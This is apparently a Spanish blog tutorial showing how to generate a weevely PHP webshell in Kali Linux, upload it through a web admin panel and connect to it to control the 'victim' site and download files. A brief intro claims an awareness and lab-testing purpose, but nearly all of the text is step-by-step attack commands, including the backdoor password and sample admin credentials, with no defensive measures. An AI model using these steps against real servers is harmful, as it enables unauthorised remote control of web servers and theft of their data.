Backdoor Webshell con weevely en Kali Linux

Introducción

En este manual vamos a analizar la forma en la que usuarios malintencionados pueden llegar a tomar control de nuestros sistemas web (paginas web). Para evitar que lleguen a colocarnos archivos archivos maliciosos en nuestro sistema debemos de sanitisar nuestro código con las medidas de seguridad que el mismo php recomienda 
Recordemos que para hacer nuestras pruebas debemos tener un sistema de pruebas con vulnerabilidades lo cual lo podemos instalar siguiendo este manual.

Instalación

En los siguientes sencillos 3 pasos podemos iniciar nuestra pruebas con weevely:
1.- Instalamos PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
2.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el comando anterior de errores quizás falta instalar dependencias como se muestra aqui
3.- Subimos el archivo web.php.jpx a la pagina victima
En mi caso:
http://192.168.8.103/admin/
User: admin
Password: P4ssw0rd
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Información básica sobre protección de datos Ver más

  • Responsable: Eugenio Chaparro.
  • Finalidad:  Moderar los comentarios.
  • Legitimación:  Por consentimiento del interesado.
  • Destinatarios y encargados de tratamiento:  No se ceden o comunican datos a terceros para prestar este servicio. El Titular ha contratado los servicios de alojamiento web a digitalocean.com que actúa como encargado de tratamiento.
  • Derechos: Acceder, rectificar y suprimir los datos.
  • Información Adicional: Puede consultar la información detallada en la Política de Privacidad.

Esta web utiliza cookies propias y de terceros para su correcto funcionamiento y para fines analíticos y para mostrarte publicidad relacionada con sus preferencias en base a un perfil elaborado a partir de tus hábitos de navegación. Contiene enlaces a sitios web de terceros con políticas de privacidad ajenas que podrás aceptar o no cuando accedas a ellos. Al hacer clic en el botón Aceptar, acepta el uso de estas tecnologías y el procesamiento de tus datos para estos propósitos. Más información
Privacidad